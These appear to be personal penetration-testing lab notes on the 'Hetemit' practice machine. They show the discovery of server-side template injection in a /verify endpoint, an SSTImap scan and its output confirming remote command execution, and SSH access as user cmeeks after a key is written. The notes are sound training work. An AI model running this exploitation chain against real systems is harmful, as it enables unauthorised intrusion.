SSTI
SSTI has been identified in the code parameter of the /verify endpoint in the Web server on the target port 50000
/Practice/Hetemit/3-Exploitation/attachments/{4CF65E37-3621-4F45-91A7-759FBFD98A4E}.png)
Sandbox Bypass is possible
RCE confirmed
SSTImap
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ git clone https://github.com/vladko312/sstimap ; cd sstimap
Cloning into 'sstimap'...
remote: Enumerating objects: 275, done.
remote: Counting objects: 100% (136/136), done.
remote: Compressing objects: 100% (94/94), done.
remote: Total 275 (delta 78), reused 71 (delta 42), pack-reused 139 (from 1)
Receiving objects: 100% (275/275), 167.55 KiB | 3.72 MiB/s, done.
Resolving deltas: 100% (157/157), done.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit/sstimap]
└─$ python3 -m venv myVenv ; source ./myVenv/bin/activate
┌──(myVenv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit/sstimap]
└─$ pip3 install -r requirements.txtUsing SSTImap
┌──(myVenv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit/sstimap]
└─$ python3 sstimap.py -u http://$IP:50000/verify -m POST -d code
╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 1.2.3
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Loaded plugins by categories: languages: 5; generic: 3; engines: 17; legacy_engines: 2
[*] Loaded request body types: 4
[*] Scanning url: http://192.168.218.117:50000/verify
[*] Testing if Body parameter 'code' is injectable
[...REDACTED...]
[+] SSTImap identified the following injection point:
Body parameter: code
Engine: Python
Injection: *
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun SSTImap providing one of the following options:
--interactive Run SSTImap in interactive mode to switch between exploitation modes without losing progress.
--os-shell Prompt for an interactive operating system shell.
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port.
--reverse-shell HOST PORT Send a shell back to the attacker's port.
--upload LOCAL REMOTE Upload files to the server.
--download REMOTE LOCAL Download remote files.Confirmed
Exploitation
/Practice/Hetemit/3-Exploitation/attachments/{4001CAD2-EA12-4667-A80E-C7B4269FB878}.png)
/Practice/Hetemit/3-Exploitation/attachments/{74F8A777-9F88-4DCE-8064-7FA8876E7DFB}.png)
/Practice/Hetemit/3-Exploitation/attachments/{3BFF79A8-29DA-4959-8A55-B3C4539D5C74}.png)
Writing SSH key
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ ssh cmeeks@$IP -i ~/.ssh/id_ed25519
The authenticity of host '192.168.218.117 (192.168.218.117)' can't be established.
ED25519 key fingerprint is SHA256:lncQzilVmJcYmSxhFreTweZeyaqTAiomI9pvTK0k7ac.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.218.117' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Activate the web console with: systemctl enable --now cockpit.socket
[cmeeks@hetemit ~]$ whoami
cmeeks
[cmeeks@hetemit ~]$ hostname
hetemit
[cmeeks@hetemit ~]$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.218.117 netmask 255.255.255.0 broadcast 192.168.218.255
inet6 fe80::ba64:c85e:f8db:5a09 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:9e:90:4d txqueuelen 1000 (Ethernet)
RX packets 8780971 bytes 854431488 (814.8 MiB)
RX errors 0 dropped 1053 overruns 0 frame 0
TX packets 8203205 bytes 1679879312 (1.5 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 4980 bytes 1337637 (1.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4980 bytes 1337637 (1.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Initial Foothold established to the target system as thee cmeeks user via SSH through SSTI